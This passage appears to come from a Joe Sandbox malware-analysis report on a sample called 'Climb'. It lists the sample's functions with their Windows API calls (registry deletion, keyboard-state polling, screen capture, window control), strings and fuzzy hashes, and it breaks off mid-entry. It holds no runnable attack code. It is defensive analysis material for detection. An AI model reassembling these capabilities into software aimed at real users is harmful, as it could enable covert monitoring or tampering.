API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 0cd7bd6f09dca1205429344bb0233942a03a14fe352469a29b96bdf4120de9e6
Instruction ID: d44310b0ab13d6c050a8b66be04e06a313427e983c75e6e68dc854da5964902e
Opcode Fuzzy Hash: 0cd7bd6f09dca1205429344bb0233942a03a14fe352469a29b96bdf4120de9e6
Instruction Fuzzy Hash: 5541F775600208BFDB22DFE5DC48EBBBBB9EB89715F104158FA05DB260DB709942DB60

Function 00AEC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00AEC26A
RegCloseKey.ADVAPI32(?), ref: 00AEC2DE
RegCloseKey.ADVAPI32(?), ref: 00AEC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00AEC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AEC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00AEC382
FreeLibrary.KERNEL32(00000000), ref: 00AEC3E3
RegCloseKey.ADVAPI32(00000000), ref: 00AEC3F4

Strings

RegDeleteKeyExW, xrefs: 00AEC35E
advapi32.dll, xrefs: 00AEC34D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 6fd46ce092f7d91287e03c5d317cbf15431cb0459cc1bd4c788d721be7e4ee21
Instruction ID: 24391200ab50be3fdbe787ffb11cf482f4688d81b64e92ac92a8498d74952098
Opcode Fuzzy Hash: 6fd46ce092f7d91287e03c5d317cbf15431cb0459cc1bd4c788d721be7e4ee21
Instruction Fuzzy Hash: D2C18B35204342AFD711DF65C494F6ABBF1BF84318F18859CE46A8B2A2CB35ED46CB91

Function 00AE2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AE3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AE3045
CreateCompatibleDC.GDI32(?), ref: 00AE3051
SelectObject.GDI32(00000000,?), ref: 00AE305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AE30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AE3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AE312D
SelectObject.GDI32(?,?), ref: 00AE3135
DeleteObject.GDI32(?), ref: 00AE313E
DeleteDC.GDI32(?), ref: 00AE3145
ReleaseDC.USER32(00000000,?), ref: 00AE3150

Strings

(, xrefs: 00AE30EA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 96e5c5c0dc0b2485309e7bee0f173359646c366145f5e65de45773ff89af2c1f
Instruction ID: ad48a3ef3d47419858c0a4695a49cfe43b323851e9329a75fd23d0e3a479c01e
Opcode Fuzzy Hash: 96e5c5c0dc0b2485309e7bee0f173359646c366145f5e65de45773ff89af2c1f
Instruction Fuzzy Hash: 4161F276D00219AFCF05CFE4D988EAEBBB6FF48310F208519E556A7210D771AA41CF90

Function 00AFA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

GetSystemMetrics.USER32(0000000F), ref: 00AFA990
GetSystemMetrics.USER32(00000011), ref: 00AFA9A7
GetSystemMetrics.USER32(00000004), ref: 00AFA9B3
GetSystemMetrics.USER32(0000000F), ref: 00AFA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00AFAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AFAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00AFAC54
ShowWindow.USER32(00000003,00000000), ref: 00AFAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00AFAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00AFACBB

Strings

@, xrefs: 00AFABD0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: ae4ddf341139bd850869e28acb770ac812a2270594b46497347a5e8a81135932
Instruction ID: b520ece6318851e183486649e2c192028c41a7f61cc75ad495e43fa946305fb2
Opcode Fuzzy Hash: ae4ddf341139bd850869e28acb770ac812a2270594b46497347a5e8a81135932
Instruction Fuzzy Hash: 73B166B5600219EBDF14CFA8C9847FE7BB2BF54700F188069FE49AA295D770A981CB51

Function 00AC52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00AC52E6
GetWindowTextW.USER32(?,?,00000400), ref: 00AC5328
_wcslen.LIBCMT ref: 00AC5339
CharUpperBuffW.USER32(?,00000000), ref: 00AC5345
_wcsstr.LIBVCRUNTIME ref: 00AC537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00AC53B2
GetWindowTextW.USER32(?,?,00000400), ref: 00AC53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00AC5445
GetClassNameW.USER32(?,?,00000400), ref: 00AC5477
GetWindowRect.USER32(?,?), ref: 00AC54EF

Strings

ThumbnailClass, xrefs: 00AC53BD, 00AC5450

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 0a7906548e9164512837823691d2b7a85e3ee9155a99ad2ebffd128d8b0ebad5
Instruction ID: 677bf5279ef2b787521e1a02c7aa692e2a52c543eaeb7f37cf47a637ac223180
Opcode Fuzzy Hash: 0a7906548e9164512837823691d2b7a85e3ee9155a99ad2ebffd128d8b0ebad5
Instruction Fuzzy Hash: 4B91D471904A0AAFD708DF34C994FAAB7AAFF40340F01451DFA4686191EB31FD95CB91

Function 00AF976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AF97B6
GetFocus.USER32 ref: 00AF97C6
GetDlgCtrlID.USER32(00000000), ref: 00AF97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AF9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AF992B
GetMenuItemCount.USER32(?), ref: 00AF9948
GetMenuItemID.USER32(?,00000000), ref: 00AF9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AF998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AF99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AF99FD

Strings

0, xrefs: 00AF98FB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 7b4d85a389db2be86b23accdfda1a4a4e407c9685bd2a32524a8597da51e75d1
Instruction ID: 03d82c921fc03fae48d00d7ddd11a1766aeae203837bd3689b673de2eb764fd6
Opcode Fuzzy Hash: 7b4d85a389db2be86b23accdfda1a4a4e407c9685bd2a32524a8597da51e75d1
Instruction Fuzzy Hash: 4081CD715083099FD711DFA5C884BBBBBE8FB89394F100A1DFA8597291DB70D905CBA2

Function 00ACC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00B329C0,000000FF,00000000,00000030), ref: 00ACC973
SetMenuItemInfoW.USER32(00B329C0,00000004,00000000,00000030), ref: 00ACC9A8
Sleep.KERNEL32(000001F4), ref: 00ACC9BA
GetMenuItemCount.USER32(?), ref: 00ACCA00
GetMenuItemID.USER32(?,00000000), ref: 00ACCA1D
GetMenuItemID.USER32(?,-00000001), ref: 00ACCA49
GetMenuItemID.USER32(?,?), ref: 00ACCA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ACCAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACCAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ACCB0C

Strings

0, xrefs: 00ACC904

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 7e262132a58694f461e2587f3af433814b1d4da3fcc2dca008df97f3127f9597
Instruction ID: e30201ec6ea451966547a055c18d0223564ead8298cabc3655b9ed942ed0d334
Opcode Fuzzy Hash: 7e262132a58694f461e2587f3af433814b1d4da3fcc2dca008df97f3127f9597
Instruction Fuzzy Hash: FB61AE70900249AFDF11CFA8C989FFE7BBAFB053A8F150159E819A7251DB34AD05CB60

Function 00ACE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00ACE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00ACE4FA
_wcslen.LIBCMT ref: 00ACE504
_wcsstr.LIBVCRUNTIME ref: 00ACE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00ACE570

Strings

StringFileInfo\, xrefs: 00ACE543
DefaultLangCodepage, xrefs: 00ACE5D3
\VarFileInfo\Translation, xrefs: 00ACE568
%u.%u.%u.%u, xrefs: 00ACE64E
04090000, xrefs: 00ACE5A6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 4317cf138163a49996c2078984f68f397e4908b589d4421e90b4b5b90a32113b
Instruction ID: 23403438839c559c680fa51bb87d8b8784415f67269a301172bf93cfeeeb2868
Opcode Fuzzy Hash: 4317cf138163a49996c2078984f68f397e4908b589d4421e90b4b5b90a32113b
Instruction Fuzzy Hash: 104136726002187BEB01FBB49E47FBF77ACEF55320F110069F900AA182FB749A0193A5

Function 00AED694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AED6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00AED6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AED7A8

Part of subcall function 00AED694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00AED70A
Part of subcall function 00AED694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00AED71D
Part of subcall function 00AED694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AED72F
Part of subcall function 00AED694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AED765
Part of subcall function 00AED694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AED788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00AED753

Strings

RegDeleteKeyExW, xrefs: 00AED729
advapi32.dll, xrefs: 00AED718

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 2267139e742bf5d6d3590ffa1cfaca849f8e578f38f69283a5a56d731f5bf6a4
Instruction ID: 43eb2c40e081e173e3fa4b10a99bc8153783bbb42d753ff21228198102360c54
Opcode Fuzzy Hash: 2267139e742bf5d6d3590ffa1cfaca849f8e578f38f69283a5a56d731f5bf6a4
Instruction Fuzzy Hash: 99316D76A01129BBDB21DBD1DC88EFFBB7DEF46750F000165B806E6150DB349E46DAA0

Function 00ACEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00ACEFCB

Part of subcall function 00A7F215: timeGetTime.WINMM(?,?,00ACEFEB), ref: 00A7F219

Sleep.KERNEL32(0000000A), ref: 00ACEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00ACF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ACF03E
SetActiveWindow.USER32 ref: 00ACF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ACF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00ACF08A
Sleep.KERNEL32(000000FA), ref: 00ACF095
IsWindow.USER32 ref: 00ACF0A1
EndDialog.USER32(00000000), ref: 00ACF0B2

Strings

BUTTON, xrefs: 00ACF030

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 601376ef049632032f9ae7f4eff8366dc85902161196cd3006ff3c35572cba70
Instruction ID: 3c02e244dee13155b2aecfbbfbf684156c984c093c588d21f8804f66fe0c80f3
Opcode Fuzzy Hash: 601376ef049632032f9ae7f4eff8366dc85902161196cd3006ff3c35572cba70
Instruction Fuzzy Hash: 07219D71244604BFE712AFA0EC8AF3A7BABFB49F44B110028F50587272DF758C02CA61

Function 00ACF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ACF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ACF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ACF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ACF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ACF3BE

Strings

close PlayMe, xrefs: 00ACF385, 00ACF3B2
play PlayMe wait, xrefs: 00ACF3A8
alias PlayMe, xrefs: 00ACF34D
play PlayMe, xrefs: 00ACF3B9
open , xrefs: 00ACF323
status PlayMe mode, xrefs: 00ACF36F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 75854e876d53e9357046bf82b1cec73aff98475d3a262fa07e1be85ced20c3dd
Instruction ID: 14484cffd4e6203b6550db5560bb79e610aa833192c46e47c7c60c0d2d0deafb
Opcode Fuzzy Hash: 75854e876d53e9357046bf82b1cec73aff98475d3a262fa07e1be85ced20c3dd
Instruction Fuzzy Hash: 59110631AD02687DD720B3A1DC0AFFF6ABCEBD2B40F0004697411E60E0DEA01D84C5B0

Function 00ACA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ACA9D9
SetKeyboardState.USER32(?), ref: 00ACAA44
GetAsyncKeyState.USER32(000000A0), ref: 00ACAA64
GetKeyState.USER32(000000A0), ref: 00ACAA7B
GetAsyncKeyState.USER32(000000A1), ref: 00ACAAAA
GetKeyState.USER32(000000A1), ref: 00ACAABB
GetAsyncKeyState.USER32(00000011), ref: 00ACAAE7
GetKeyState.USER32(00000011), ref: 00ACAAF5
GetAsyncKeyState.USER32(00000012), ref: 00ACAB1E
GetKeyState.USER32(00000012), ref: 00ACAB2C
GetAsyncKeyState.USER32(0000005B), ref: 00ACAB55
GetKeyState.USER32(0000005B), ref: 00ACAB63

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 436c065bfa2ccfc73ff819fd9039d32260af1eeddc2a8b6ea8ce882f166e18b4
Instruction ID: ba926226b9196ac4f65ab343c4d87dcc826d75f7c8f6e37cbb952d0ff4096854
Opcode Fuzzy Hash: 436c065bfa2ccfc73ff819fd9039d32260af1eeddc2a8b6ea8ce882f166e18b4
Instruction Fuzzy Hash: 6451E420A0478C29EB35D7A08951FFAAFF59F21388F0A859DC5C25A1C2DA649F4CC763

Function 00AC662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AC6649
GetWindowRect.USER32(00000000,?), ref: 00AC6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AC66C0
GetDlgItem.USER32(?,00000002), ref: 00AC66D0
GetWindowRect.USER32(00000000,?), ref: 00AC66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AC6736
GetDlgItem.USER32(?,000003E9), ref: 00AC6744
GetWindowRect.USER32(00000000,?), ref: 00AC6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AC6798
GetDlgItem.USER32(?,000003EA), ref: 00AC67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AC67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00AC67CE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f2a3860a05915cf58938872ec72a9b6eed21cdd53e7f13b482cbed689722dfef
Instruction ID: 431261a0cc66c144a456de7b3cb1421a408fa2602d7419cfe792364eb9d90b66
Opcode Fuzzy Hash: f2a3860a05915cf58938872ec72a9b6eed21cdd53e7f13b482cbed689722dfef
Instruction Fuzzy Hash: D9510DB1A00205AFDF18CFA8DD89BAEBBB6FB48315F118529F919E7290D7709D05CB50

Function 00A6146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A61802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A61488,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A61865

DestroyWindow.USER32(?), ref: 00A61521
KillTimer.USER32(00000000,?,?,?,?,00A6145A,00000000,?), ref: 00A615BB
DestroyAcceleratorTable.USER32(00000000), ref: 00AA29B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00AA29E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000,?), ref: 00AA29F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A6145A,00000000), ref: 00AA2A15
DeleteObject.GDI32(00000000), ref: 00AA2A27

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: a7b7c49de584378cc398515626d7c7df7c61cb45688a8ec2f837b37da3c3bfa4
Instruction ID: 29eac1e6328479e9e325a7619f3c17ca9d0c2413edc70c31d64f1927a99c308c
